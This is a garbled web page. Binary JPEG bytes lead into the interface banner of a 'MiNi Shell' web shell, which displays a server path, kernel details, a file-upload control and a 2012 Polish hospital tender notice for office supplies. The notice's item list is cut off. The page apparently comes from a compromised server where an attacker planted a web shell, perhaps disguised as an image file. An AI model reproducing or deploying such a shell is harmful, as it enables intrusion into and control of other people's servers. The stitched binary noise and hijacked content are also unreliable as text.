JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120914/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120914/348936-N-2012.html

<p class="kh_header"><b>Bochnia: Dostawa artykułów biurowych oraz płyt CD, DVD
dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy 
im. bł. Marty Wieckiej</b><br>
<b>Numer ogłoszenia: 348936 - 2012; data zamieszczenia: 14.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni "Szpital Powiatowy" im. bł. Marty Wieckiej , ul. Krakowska 31, 32-700 Bochnia, woj. małopolskie, tel. 14 6153201, 6153233, 50979196, faks 14 6153202.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bochnia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów biurowych oraz płyt CD, DVD
dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy 
im. bł. Marty Wieckiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: dostawa artykułów biurowych oraz płyt CD, DVD dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej opisanego w sposób szczegółowy w załączniku nr 3 SIWZ
według wymienionych poniżej pakietów:
Pakiet nr 1 - Materiały papierniczo - biurowe
Pakiet nr 2 - Płyty CD,  DVD.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.23.43.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony, jeżeli wykonawca przedstawi oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony, jeżeli wykonawca przedstawi oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony, jeżeli wykonawca przedstawi oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony, jeżeli wykonawca przedstawi oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony, jeżeli wykonawca przedstawi oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	W przypadku podpisywania oferty lub poświadczania za zgodność z oryginałem kopii dokumentów przez osob(ę)y nie wymienion(ą)e w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwa. 
W przypadku udzielenia pełnomocnictwa, wymagana jest forma, rodzaj i zakres pełnomocnictwa właściwy do poszczególnych czynności. Kserokopia pełnomocnictwa musi być poświadczona przez notariusza.
2.	W przypadku gdy, Wykonawca powołuje się na wiedzę i doświadczenie, potencjał techniczny, osoby zdolne do wykonania zamówienia lub zdolności finansowe innych podmiotów - pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia wraz z określeniem zakresu udzielanych zasobów. 
3.	Pełnomocnictwo do reprezentowania konsorcjum w postępowaniu o udzielenie zamówienia publicznego lub do reprezentowania w postępowaniu o udzielenie zamówienia publicznego 
i zawarcia umowy - w przypadku wykonawców wspólnie ubiegający się o udzielenie 
Dokumenty mogą być przedstawione w formie oryginału lub kopii poświadczonych (każda strona dokumentu) za zgodność z oryginałem przez  wykonawcą.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany niniejszej umowy z zastrzeżeniem art. 144 ust. 1 ustawy Prawo zamówień publicznych mogą być dokonywane za zgodą obu Stron, wyrażoną na piśmie, pod rygorem nieważności. 
2.	Strony dopuszczają zmiany w umowie w następującym zakresie:
a)	numeru katalogowego produktu,
b)	nazwy produktu przy zachowaniu jego parametrów,
c)	sposobu konfekcjonowania,
d)	danych identyfikujących strony umowy, takich jak np. firma, adresu siedziby lub inne zapisy dotyczące wskazania stron. 
3.	W przypadku zmiany wielkości opakowania wprowadzonej przez producenta, strony dopuszczają zmianę cen jednostkowych preparatów objętych umową z zachowaniem zasady proporcjonalności w stosunku do ceny objętej umową
4.	Wykonawca zobowiązuje się do nie zwiększania cen jednostkowych netto określonych, w ofercie przetargowej przez okres trwania umowy, przy czym w czasie trwania umowy ceny mogą ulec zmianie w przypadku wzrostu/spadku obowiązujących stawek podatków i opłat granicznych. 
5.	W każdym czasie trwania umowy Wykonawca może dokonać obniżki cen jednostkowych. 
6.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w razie wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcie umowy tj.:
a)	zakończenia produkcji oferowanego produktu
b)	wygaśnięcia rejestracji oferowanego produktu
7.	Na potwierdzenie okoliczności, o których mowa w ust. 6 Wykonawca przedstawi pisemne zawiadomienie producenta.
8.	Wykonawca w sytuacji określonej w ust. 6, w porozumieniu z Zamawiającym zaproponuje produkt równoważny z zachowaniem formy pisemnej pod rygorem nieważności. 
9.	Cena jednostkowa proponowanego produktu nie może być wyższa niż produktu oferowanego w załączniku nr 1 do niniejszej umowy
10.	W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od daty powzięcia wiadomości o tych okolicznościach</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-bochnia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej, ul.  Krakowska 31, 32-700 Bochnia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.09.2012 godzina 11:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego w Bochni przy ul. Krakowskiej 31 na Dzienniku podawczym pokój nr 12, Pawilon A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - Materiały papierniczo - biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Bloczek samoprzylepny 38mm x 51 mm - 100 kart.	szt.	532
2.	Bloczek samoprzylepny 76mm x 76 mm - 100 kart.	szt.	490
3.	Blok do flipcharta gładki 65x100 cm (50 kartek)	szt.	2
4.	Blok szkolny (notatnik wyrywany - kratka) A4 - 100 kart.	szt.	40
5.	Blok szkolny (notatnik wyrywany - kratka) A5 - 100 kart.	szt.	80
6.	Cienokopis kulkowy, grubość linii pisma 0,3 mm typu Pilot, kolor do wyboru przy zamówieniu	szt.	20
7.	Datownik samotuszujący, ustawianie ręczne, z miesiącami w języku polskim, wysokość czcionki 4 mm	szt.	10
8.	Deska z klipem A4 wyposażona w sprężysty mechanizm zaciskowy służący do podtrzynywania kartek papieru	szt.	40
9.	Długopis jednorazowy z koncówką 1,0 mm, przeźroczysta obudowa umożliwia kontrolę zuzycia tuszu, długośc linii pisania 2200 m, kolor do wyboru przy zamówieniu	szt.	600
10.	Druk dowód wpłaty	bloczek	2
11.	Druk karta drogowa 100 kart numerowana	bloczek	35
12.	Druk księga druków ścisłego zarachowania	bloczek	4
13.	Druk kwitariusz przychodowy - format A5; 60 kart.	bloczek	2
14.	Druk magazyn wyda - format A5, 80 kart.	bloczek	120
15.	Druk Arkusz spisu z natury, uniwersalny, samokopiujący, układ pionowy format A4	bloczek	10
16.	Dziennik korespondencyjny, twrada oprawa, A4, 192 kart	szt.	10
17.	Dziurkacz posiadający plastikowe ramię i metalową podstawę, listwę formatową iwskaźnik środka strony, roztaw dziurek 80 mm, średnica otworu 5mm, dziurkuje do 20 kartek, gwarancja min. 3 lata	szt.	5
18.	Foliopis napełniony niezmywalnym i szybkoschnącym atramentem, piszącym lekko i płynie na praktycznie każdych powierzchniach: foliach, szkle, porcelanie, płytach CD/DVD, grubość lini 1,0mm	szt.	511
19.	grafity do wszystkich rodzajów ołówków automatycznych, grubość 0,5 mm, twardość HB, niełamliwe	op.	10
20.	grafity do wszystkich rodzajów ołówków automatycznych, grubość 0,7 mm, twardość HB, niełamliwe	op.	10
21.	Grzbiet plastikowy do bindownicy kolorowe, kolorowe, średnica 19 mm /na 150 kartek/, op. 100 szt.	op.	1
22.	Grzbiet plastikowy do bindownicy kolorowe, kolorowe, średnica 25 mm /na 150 kartek/, op. 100 szt.	op.	3
23.	Grzbiet plastikowy do bindownicy kolorowe, średnica 10 mm /na70 kartek/, op. 100 szt.	op.	1
24.	Grzbiet plastikowy do bindownicy kolorowe, średnica 32 mm /na 300 kartek/, op. 100 szt.	op.	1
25.	Grzbiet zaciskowy, do 30 kartek, posiadjący listę z perforacją umożliwiającą wpięcie oprawionych dokumentów do segregatora, przezroczyste	szt.	30
26.	Grzbiet zaciskowy, do 60 kartek, posiadjący listę z perforacją umożliwiającą wpięcie oprawionych dokumentów do segregatora, przezroczyste	szt.	10
27.	Grzbiet wsuwany 10 mm,  umożliwiający łatwą oprawę dokumentów, wielokrotnego użytku, nie rysujący okładek chroniących dokument, op. 50 szt.	op.	1
28.	Grzbiet wsuwany 6 mm,  umożliwiający łatwą oprawę dokumentów, wielokrotnego użytku, nie rysujący okładek chroniących dokument, op. 50 szt.	op.	2
29.	Grzbiet wsuwany do 9 mm,  umożliwiający łatwą oprawę dokumentów, wielokrotnego użytku, nie rysujący okładek chroniących dokument, op. 50 szt.	op.	1
30.	gumka do ścierania ołówka, nie niszcząca ścieranej powierzchni	szt.	20
31.	Identyfikator z przeźroczystego, sztucznego tworzywa, wyposażony w klips sprężynujący i niewielką agrafkę, format 57x90mm 	szt.	130
32.	Kalendarz biurkowy   na rok 2013 układ pionowy, wymiary: 13 x 20 cm, - jeden tydzień na każdej stronie, w prawym dolnym rogu skrócony kalendarzyk miesiąca, na początku kalendarza skrót roku,     wszystkie     kartki     połączone     spiralką    z możliwością wygodnego przekładania stron, podstawka o profilu trójkątnym zapewniająca stabilność	szt.	50
33.	Kalendarz na rok 2013 Format    A4,    w    twardej    oprawie    z    tworzywa skóropodobnego,   jeden   dzień   na   jednej    stronie z notatnikiem alfabetyczno  -adresowy;	szt.	3
34.	Kalendarz na rok 2013 Format    A5,    w    twardej    oprawie    z    tworzywa skóropodobnego,   jeden   dzień   na   jednej    stronie z notatnikiem alfabetyczno  -adresowy;	szt.	26
35.	Kalka maszynowa czarna do kopiowania, arkusze wielokrotnego użytku, gramatura warstwy kopiującej: 10g/m2, ilość arkuszy w jednostce 100 szt.	op.	15
36.	Klej w płynie wyposażony w metalową kulkę do nanoszenia kleju, nie zawiera rozpuszczalników, usuwany za pomoca wody poj. 50 ml	szt.	4
37.	Klej w sztywcie bezbarwny i bezwonny, nietoksyczny idealny do klejenia papieru, poj. 20-22 g.	szt.	60
38.	Klipsy do papieru 25 mm  odporne na odkształcenie, op. 12 szt.	op.	10
39.	Klipsy do papieru 32 mm  odporne na odkształcenie, op. 12 szt.	op.	18
40.	Klipsy do papieru 51 mm  odporne na odkształcenie, op. 12 szt.	op.	7
41.	Koperta biała B-5  HK 175x250 mm /samoprzylepna/ op. 500 szt. 	op.	5
42.	Koperta biała C-4 HK 229x324 mm /samoprzylepna/ op. 250 szt.	op.	14
43.	Koperta biała C-6 SK 114x162 mm /samoprzylepna/ op. 1000 szt./ 	op.	23
44.	Koperta CD bezokienkowa	szt.	32 000
45.	Koperta ochronne z warstwa folii bąbelkowej wewnatrz samoprzylepne 235-240 x 340 mm	szt.	5
46.	Koperta szara / brązowa  C-4 HK 229x324 mm /samoprzylepna/ op. 250 szt.	op.	1
47.	Koperta szara / brązowa B-5  HK 175x250 mm /samoprzylepna/ op. 500 szt. 	op.	100
48.	Koperta szara/brązowa  o wym. 300 mm x 300 mm , samoprzylepna 	szt.	5000
49.	Koperta z rozszerzonym bokiem i spodem C-4 229-230x324x38-40 mm, brązowa, samoprzylepna	szt.	60
50.	Korektor w piórze, szybkoschnący, nie gęstniejący i nie wysychający pojemność 10 ml.	szt.	3
51.	Korektor w płynie - z pędzelkiem, ekologiczny, idealnie  kryjący, szybkoschnący, pojemność 20 ml	szt.	15
52.	Koszulka foliowa A3 - op. 100 szt., transparentna matowa, otwarta na górze, wzmocniony dziurkowany brzeg pozwalający wpięcie do każdego segregatora, perforacja wg dłuższego brzegu	op.	1
53.	Koszulka foliowa A4 - op. 100 szt. kieszeń groszkowa,    transparentna matowa, otwarta na górze, wzmocniony dziurkowany brzeg pozwalający na wpięcie do każdego segregatora, 	op. 	600
54.	Koszulka foliowa A4  z boczną klapka, przeźroczysta matowa, wzmocniony dziurkowany brzeg pozwalający na wpięcie do segragatora,  - op. 10 szt.	op. 	1
55.	Koszulka foliowa A4 poszerzona - możliwość przechowywania większej ilości dokumentów (np. grubszych katalogów), harmonijkowy brzeg koszulki, przeźroczysta matowa, wzmocniony dziurkowany brzeg pozwalający na wpięcie do segragatora, otwrata od góry	szt.	10
56.	Koszulka foliowa A5 - op. 100 szt. kieszeń groszkowa,    transparentna matowa, otwarta na górze, wzmocniony dziurkowany brzeg pozwalający na wpięcie do każdego segregatora, 	op. 	10
57.	Marker nietoksyczny, wodoodporny, końcówka okrągła, grubość końcówki 1,5-3mm, kolor czarny	szt.	400
58.	Nożyczki biurowe 21-22 mm do  cięcia papieru,  sznurka,  materiałów tekstylnych, ostrze ze stali nierdzewnej, uchwyt z niełamliwego tworzywa, wyprofilowana rękojeść	szt.	10
59.	Ofertówka sztwna, otwierana od góry i prawej strony, format A4	szt.	2000
60.	Okładki do bindowania, format A4, kartonowe o gramaturze 250g/m2; różne kolory, op. 100 szt.	op.	8
61.	Okładki do bindowania, format A4, przezroczysta, bezbarwna, z PCV, op. 100 szt.	op.	8
62.	Ołówek automatyczny z gumką 0,5 mm z uchwytem gumowym, metalowy typu PENTEL lub równoważny	szt.	10
63.	Ołówek automatyczny z gumką 0,7 mm z uchwytem gumowym, metalowy typu PENTEL lub równoważny	szt.	10
64.	Papier do drukarki termicznej 57mm	szt.	20
65.	Papier do faxu 210x30 (6 szt/op)	op.	16
66.	Papier komputerowy z perforacją, do drukarek igłowych,  240 x 12 - oryginał + 2 kopie (bez nadruku)	op.	6
67.	Papier komputerowy z perforacją, do drukarek igłowych, 240 x 12 - oryginał (bez nadruku)	op.	6
68.	Papier komputerowy z perforacją, do drukarek igłowych, 240 x 12 - oryginał + kopia (bez nadruku)	op.	5
69.	Papier ksero A3-ryza 500 szt, gramatura 80g/m2, wilgotość 3,8-5%, białość (CIE)161(+/-2), nieprzeźroczystość 94%+2/-1, gładkosć 180 cm 3/min.(+/-50), typu Pol lux 	ryza	12
70.	Papier ksero A4 - ryza 500 szt, gramatura 80g/m2, białość(CIE)160(+/- 3), gładkość 180 cm3/min. (?50); typu Pol Lux	ryza	2200
71.	Papier  A4 - ryza 250 szt, gramatura 200g/m2, białość(CIE)160(+/- 3), gładkość 180 cm3/min. (?50); 	ryza	2
72.	Papier ksero A4 mix kolor (kolory pastelowe) ryza 500 szt, gramatura 80g/m2, gładkość 180 cm3/min. (?50), typu Pol  lux	ryza	2
73.	Pinezki do tablic korkowych, posiadają plastikowe uchwyty w różnych kolorach, op. 50 szt.	op.	8
74.	Pióro żelowe z przezroczystą obudową, pozwalającą kontrolować poziom tuszu, napełnione nieblaknącym i wodoodpornym tuszem. Wymienny wkład, grubość lini pisma: 0,6 mm	szt.	180
75.	Półki na dokumenty formatu A4, przeźroczyste, platikowe, z mozliwością ustawiania jedna na drugiej pionowa lub pod skosem	szt.	100
76.	Pudełko archiwizujące format A4 na segregator szerokość grzbietu 90mm wysokość 300mm długość 356mm	szt.	180
77.	Rolka kasowa 57 mm /dalton/ op. 10 szt.	op.	4
78.	Rolka kasowa typu RK 05730 T, papier bezpyłowy, bezdrzewny, bezchlorowy; szerokość roki 57 mm, dł. 30 m	szt.	10
79.	Rozszywacz	szt.	9
80.	Segregator A4/ z wymienną etykietą, na dolnych krawędziach metalowe okucia, oklejony zewnatrz poliolefiną, a wewnątrz papierem, dźwignia wysokiej jakości z dociskaczem,   wzmocniony   otwór   na   palec, dwa otwory na przedniej okładce,  szerokość grzbietu 50 mm	szt.	180
81.	Segregator A4/ z wymienną etykietą, na dolnych krawędziach metalowe okucia, oklejony zewnatrz poliolefiną, a wewnątrz papierem, dźwignia wysokiej jakości z dociskaczem,   wzmocniony   otwór   na   palec, dwa otwory na przedniej okładce,  szerokość grzbietu 75 mm	szt.	500
